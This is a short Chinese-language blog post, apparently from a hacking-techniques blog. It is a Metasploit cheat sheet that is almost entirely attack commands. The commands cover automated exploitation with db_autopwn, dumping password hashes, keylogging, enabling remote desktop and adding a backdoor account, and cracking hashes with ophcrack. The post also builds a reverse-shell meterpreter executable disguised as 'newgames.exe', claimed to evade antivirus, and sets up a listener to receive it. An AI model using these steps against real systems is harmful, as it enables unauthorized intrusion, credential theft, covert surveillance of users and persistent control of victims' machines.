BT5中MSF很强大的一个工具

By admin ¶  Posted in 入侵渗透技巧 ¶  Leave a reply

综合扫描服务器的软件 MSF (在线攻击)
msfconsole 进入
db_nmap -T Aggressive -sV -n -O -v IP  （调用nmap扫描指定ip）

db_hosts  （nmap的结果自动保存在hosts中）
db_autopwn -p -t -e -I ip (指定IP 攻击 -指定IP只局限与hosts里面指定的 )
db_autopwn -p -t -e

 

session -i （存在漏洞在 通过查看活动链接）
session -i  id （连接 已经通过漏洞连接上了服务端）
getuid（查看服务器名字）
sysinfo(查看当前系统)
run hashdump (导出hash)
ps (系统进程)
migrate id(进程id) 切换到该进程，系统权限
keyscan_start (键盘记录)
keyscan_dump (查看输入了什么)
keyscan_stop (通知键盘记录)
run getgui -e（开启远程桌面）
run getgui -u buxuan ip buxuan(添加账户)
linux中内置链接远程桌面命令
rdesktop ip:3389

算hash
/pentest/passwords/
ophcrack -g -d /xxx/xxx/xxxx/ -t /xxx/xxx/xxxx/ -f /字典文件
MSF（离线攻击）类似于木马 – 效果不错 -自动生成的离线基本是过金山免杀的
1：制造一个脚本：
/pentest/expoits/framework3
./msfpayload windows/meterpreter/rever_tcp LHOST=(本地)IP LPORT=33333 > /tmp/newgames.exe

192.168.9.129
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.9.129 LPORT=33333 X > /tmp/newgames.exe

2：建立服务器：
msfconsole里面操作
use exploit/multi/handler
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST IP(本地)
>set LPORT 33333
>exploit

This entry was posted in  入侵渗透技巧 by  admin. Bookmark the  permalink.